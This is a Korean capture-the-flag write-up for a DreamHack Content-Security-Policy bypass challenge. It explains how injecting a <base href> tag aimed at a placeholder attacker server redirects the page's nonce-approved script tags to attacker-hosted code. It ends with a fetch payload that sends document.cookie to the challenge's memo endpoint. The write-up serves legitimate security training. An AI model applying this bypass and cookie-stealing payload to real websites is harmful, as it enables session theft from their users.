DreamHack - CSP Bypass Advanced 풀이

자바스크립트 실행이 안된 이유

@app.after_request
def add_header(response):
    global nonce
    response.headers['Content-Security-Policy'] = f"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}'; object-src 'none'"
    nonce = os.urandom(16).hex()
    return response

request 할 때마다 헤더에 CSP(Content-Security-Policy)가 붙기 때문이다. 더 살펴보자면 script-src가 self이기 때문에 origin domain에서만 스크립트 요청이 가능하고 그 뒤에 nonce-{nonce}가 붙는데 이는 매번 무작위로 생성되는 {nonce}와 동일한 속성을 갖는 script 태그만 허용한다고 보면 된다.

아래와 같이 Flask 서버는 매번 nonce 값을 생성해 허용하는 script 태그에 nonce 값을 줌으로 클라이언트가 불러오는 게 가능한 것이다.

<script src="{{ url_for('static', filename='js/jquery.min.js')}}" nonce={{ nonce }}></script>

CSP 우회하기

근본적으로 script 태그가 실행 안된 이유가 (1) origin domain의 주소만 허용 가능하다.와 (2) nonce 값을 쉽게 예측할 수가 없다.이었으므로 이를 해결하려면 origin domain을 바꾸고 미리 허용한 스크립트 태그를 공격자의 서버에 있는 자원으로 요청하면 해결이 된다.

그래서 찾은 방법이 <base> 태그 였다.
<base> 태그는 href=/index.html 같은 상대 주소들의 base 주소를 바꾸는 역할을 한다.

사용 방법은 다음과 같다.

<base href="https://공격자의주소/">

이런 태그를 선언하면 이후에 오는 모든 href=/index.html는 href=https://공격자의주소/index.html와 같게 된다.

<script src="/static/js/jquery.min.js" nonce="랜덤"></script>
<script src="/static/js/bootstrap.min.js" nonce="랜덤"></script>

<script src="https://공격자의주소/static/js/jquery.min.js" nonce="랜덤"></script>
<script src="https://공격자의주소/static/js/bootstrap.min.js" nonce="랜덤"></script>

이렇게 되므로 공격자가 미리 서버를 열어두고 /static/js/jquery.min.js 파일을 생성해 아래와 같은 쿠키를 메모하는 코드를 작성하므로 FLAG를 얻을 수 있다.

fetch('http://127.0.0.1:8000/'+'/memo?memo='+document.cookie, {
    method: 'GET',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
}).then(res => res.text());